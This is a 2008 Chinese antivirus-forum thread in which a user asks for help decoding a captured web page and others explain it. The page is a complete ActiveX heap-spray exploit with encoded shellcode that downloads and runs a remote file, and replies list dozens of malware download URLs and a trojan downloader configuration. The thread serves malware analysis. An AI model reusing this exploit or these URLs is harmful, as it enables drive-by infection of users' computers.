查看: 3524|回复: 13
收起左侧

[已鉴定] 谁能帮解密一下这个代码,我整了很久都没解密出来

 关闭 [复制链接]
-[╳ìǎo柒]
发表于 2008-11-13 14:02:50 | 显示全部楼层 |阅读模式
<html>

<OBJECT id="target" classid="clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C">
</OBJECT>
<script>
function poc() {
var shellcode = unescape(
"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949" +
"%u4949%u4949%u4949%u4949%u5a51%u436a%u3058%u3142%u4250%u6b41" +
"%u4142%u4253%u4232%u3241%u4141%u4130%u5841%u3850%u4242%u4875" +
"%u6b69%u4d4c%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f%u6e68%u736b" +
"%u716f%u6530%u6a51%u724b%u4e69%u366b%u4e54%u456b%u4a51%u464e" +
"%u6b51%u4f70%u4c69%u6e6c%u5964%u7350%u5344%u5837%u7a41%u546a" +
"%u334d%u7831%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b%u726c%u4c6b" +
"%u534b%u376f%u636c%u6a31%u4e4b%u756b%u6c4c%u544b%u4841%u4d6b" +
"%u5159%u514c%u3434%u4a44%u3063%u6f31%u6230%u4e44%u716b%u5450" +
"%u4b70%u6b35%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b%u6c30%u5770" +
"%u5770%u4770%u4c70%u704b%u4768%u714c%u444f%u6b71%u3346%u6650" +
"%u4f36%u4c79%u6e38%u4f63%u7130%u306b%u4150%u5878%u6c70%u534a" +
"%u5134%u334f%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f%u4147%u4163" +
"%u504c%u4273%u3159%u5063%u6574%u7035%u546d%u6573%u3362%u306c" +
"%u4163%u7071%u536c%u6653%u314e%u7475%u7038%u7765%u4370%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3931%u3934%u3130%u3130%u632e%u2f6e%u6464%u2f38%u6466%u6a2e%u0073");
var buff= "";
var nsp = unescape("%u06EB%u9090");
var sh = unescape("%u6950%u74C9");
var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090");
for (i=0;i<1638;i++)  buff=buff + unescape("%u4141");
buff = buff + nsp + sh + nop + shellcode;
target.GetDetailsString(buff,1);
}
</script>
</html>
-[╳ìǎo柒]
 楼主| 发表于 2008-11-13 14:03:15 | 显示全部楼层
请解说详细一点,谢谢了

好象加的是双层密,第一次我用esc解密了后,还是没看出什么来

[ 本帖最后由 -[╳ìǎo柒] 于 2008-11-13 14:05 编辑 ]
zzh161
发表于 2008-11-13 14:06:45 | 显示全部楼层
不就是你刚才发的那个JS文件里的嘛。。。把%u后面的那四个分为两组,高低位互换,16进制转回来,大概就是这样了
-[╳ìǎo柒]
 楼主| 发表于 2008-11-13 14:07:56 | 显示全部楼层
不是,这个是另外一个
-[╳ìǎo柒]
 楼主| 发表于 2008-11-13 14:08:35 | 显示全部楼层
能转换出最后的地址吗,我想看一下到底是连接到哪个毒
zzh161
发表于 2008-11-13 14:09:16 | 显示全部楼层

回复 4楼 -[╳ìǎo柒] 的帖子

就是第一个那个弹出的网页里的,下载地址hxxp://down.19490101.cn/dd8/fd.js ,是个PE文件

顺便给你下载列表 http://121.14.145.114/liebiao/1/down.txt

[ 本帖最后由 zzh161 于 2008-11-13 14:11 编辑 ]
-[╳ìǎo柒]
 楼主| 发表于 2008-11-13 14:12:11 | 显示全部楼层
地址打不开老大
zzh161
发表于 2008-11-13 14:14:00 | 显示全部楼层
我的失误。。。你用 http://liebiao.2008just.cn/liebiao/1/down.txt 就可以打开了
http://121.14.145.114/liebiao/1/down.txt (liebiao.2008just.cn)
http://61.160.212.89/xiaoma/yufy1.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/2.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/3.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/3.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/7.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/8.exe (fuzai1.1949abab.cn)
http://61.160.212.134/xiaoma/9.exe (fuzai.1949abab.cn)
http://61.160.212.134/xiaoma/10.exe (fuzai.1949abab.cn)
http://61.160.212.89/xiaoma/yufy1.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/3.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/6.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/8.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/3.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/4.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/5.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/6.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/6.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/8.exe (fuzai1.1949abab.cn)
http://61.160.212.89/xiaoma/8.exe (fuzai1.1949abab.cn)


你可以考虑用代理

[ 本帖最后由 zzh161 于 2008-11-13 14:16 编辑 ]
-[╳ìǎo柒]
 楼主| 发表于 2008-11-13 14:22:19 | 显示全部楼层
在次感谢。。zzh161  


url1=http://fuzai1.1949abab.cn/xiaoma/yufy1.exe
biaoji1=Testk1.exe
yanshi1=0.6
url2=http://fuzai1.1949abab.cn/xiaoma/2.exe
biaoji2=Testk2.exe
yanshi2=0.2
url3=http://fuzai1.1949abab.cn/xiaoma/3.exe
biaoji3=Testk3.exe
yanshi3=0.2
url4=http://fuzai1.1949abab.cn/xiaoma/4.exe
biaoji4=Testk4.exe
yanshi4=0.2
url5=http://fuzai1.1949abab.cn/xiaoma/5.exe
biaoji5=Testk5.exe
yanshi5=0.15
url6=http://fuzai1.1949abab.cn/xiaoma/6.exe
biaoji6=Testk6.exe
yanshi6=0.15
url7=http://fuzai1.1949abab.cn/xiaoma/7.exe
biaoji7=Testk7.exe
yanshi7=0.15
url8=http://fuzai1.1949abab.cn/xiaoma/8.exe
biaoji8=Testk8.exe
yanshi8=0.15
url9=http://fuzai.1949abab.cn/xiaoma/9.exe
biaoji9=Testk9.exe
yanshi9=0.15
url10=http://fuzai.1949abab.cn/xiaoma/10.exe
biaoji10=Testk10.exe
yanshi10=0.15
url11=http://fuzai.1949abab.cn/xiaoma/11.exe
biaoji11=Testk11.exe
yanshi11=0.15
url12=http://fuzai.1949abab.cn/xiaoma/12.exe
biaoji12=Testk12.exe
yanshi12=0.15
url13=http://fuzai.1949abab.cn/xiaoma/13.exe
biaoji13=Testk13.exe
yanshi13=0.15
url14=http://fuzai.1949abab.cn/xiaoma/14.exe
biaoji14=Testk14.exe
yanshi14=0.15
url15=http://fuzai.1949abab.cn/xiaoma/15.exe
biaoji15=Testk15.exe
yanshi15=0.15
url16=http://fuzai.1949abab.cn/xiaoma/16.exe
biaoji16=Testk16.exe
yanshi16=0.15
url17=http://fuzai.1949abab.cn/xiaoma/17.exe
biaoji17=Testk17.exe
yanshi17=0.15
url18=http://fuzai.1949abab.cn/xiaoma/18.exe
biaoji18=Testk18.exe
yanshi18=0.15
url19=http://fuzai.1949abab.cn/xiaoma/19.exe
biaoji19=Testk19.exe
yanshi19=0.15
url20=http://fuzai.1949abab.cn/xiaoma/20.exe
biaoji20=Testk20.exe
yanshi20=0.15
url21=http://fuzai.1949abab.cn/xiaoma/21.exe
biaoji21=Testk21.exe
yanshi21=0.15
url22=http://fuzai.1949abab.cn/xiaoma/22.exe
biaoji22=Testk22.exe
yanshi22=0.15
url23=http://fuzai.1949abab.cn/xiaoma/23.exe
biaoji23=Testk23.exe
yanshi23=0.15
url24=http://fuzai.1949abab.cn/xiaoma/24.exe
biaoji24=Testk24.exe
yanshi24=0.15
url25=http://fuzai.1949abab.cn/xiaoma/25.exe
biaoji25=Testk25.exe
yanshi25=0.15
url26=http://fuzai.1949abab.cn/xiaoma/26.exe
biaoji26=Testk26.exe
yanshi26=0.15
url27=http://fuzai.1949abab.cn/xiaoma/27.exe
biaoji27=Testk27.exe
yanshi27=0.15
url28=http://fuzai.1949abab.cn/xiaoma/28.exe
biaoji28=Testk28.exe
yanshi28=0.15
url29=http://fuzai.1949abab.cn/xiaoma/29.exe
biaoji29=Testk29.exe
yanshi29=0.15
url30=http://fuzai.1949abab.cn/xiaoma/30.exe
biaoji30=Testk30.exe
yanshi30=0.15
url31=http://fuzai.1949abab.cn/xiaoma/31.exe
biaoji31=Testk31.exe
yanshi31=0.15
url32=http://fuzai.1949abab.cn/xiaoma/32.exe
biaoji32=Testk32.exe
yanshi32=0.15
url33=http://fuzai.1949abab.cn/xiaoma/33.exe
biaoji33=Testk33.exe
yanshi33=0.15
url34=http://fuzai.1949abab.cn/xiaoma/34.exe
biaoji34=Testk34.exe
yanshi34=0.15
url35=http://fuzai.1949abab.cn/xiaoma/35.exe
biaoji35=Testk35.exe
yanshi35=0.15
url36=http://fuzai.1949abab.cn/xiaoma/36.exe
biaoji36=Testk36.exe
yanshi36=0.15
url37=http://fuzai.1949abab.cn/xiaoma/37.exe
biaoji37=Testk37.exe
yanshi37=0.15
url38=http://fuzai.1949abab.cn/xiaoma/38.exe
biaoji38=Testk38.exe
yanshi38=0.15
url39=http://fuzai.1949abab.cn/xiaoma/39.exe
biaoji39=Testk39.exe
yanshi39=0.15
url40=http://fuzai.1949abab.cn/xiaoma/40.exe
biaoji40=Testk40.exe
yanshi40=0.15
url41=http://fuzai.1949abab.cn/xiaoma/41.exe
biaoji41=Testk41.exe
yanshi41=0.02
url42=http://fuzai.1949abab.cn/xiaoma/42.exe
biaoji42=Testk42.exe
yanshi42=0.02
url43=http://fuzai.1949abab.cn/xiaoma/43.exe
biaoji43=Testk43.exe
yanshi43=0.02
url44=http://fuzai.1949abab.cn/xiaoma/44.exe
biaoji44=Testk44.exe
yanshi44=0.02
url45=http://fuzai.1949abab.cn/xiaoma/45.exe
biaoji45=Testk45.exe
yanshi45=0.2
url46=http://fuzai.1949abab.cn/xiaoma/46.exe
biaoji46=Testk46.exe
yanshi46=0.2
url47=http://fuzai1.1949abab.cn/xiaoma/47.exe
biaoji47=Testk47.exe
yanshi47=0.2
url48=http://fuzai.1949abab.cn/xiaoma/48.exe
biaoji48=Testk48.exe
yanshi48=0.2
url49=http://fuzai1.1949abab.cn/xiaoma/49.exe
biaoji49=Testk49.exe
yanshi49=0.2
url50=http://fuzai1.1949abab.cn/xiaoma/qingfu.exe
biaoji50=Testk50.exe
yanshi50=0.5
url51=http://fuzai1.1949abab.cn/xiaoma/qq.exe

[ 本帖最后由 -[╳ìǎo柒] 于 2008-11-13 14:24 编辑 ]
evilrabbit
发表于 2008-11-13 16:46:18 | 显示全部楼层
原帖由 zzh161 于 2008-11-13 14:09 发表
就是第一个那个弹出的网页里的,下载地址hxxp://down.19490101.cn/dd8/fd.js ,是个PE文件

顺便给你下载列表 http://121.14.145.114/liebiao/1/down.txt
  麻烦版主 讲细致点 怎么个高低位互换法啊
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 15:01 , Processed in 0.113488 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表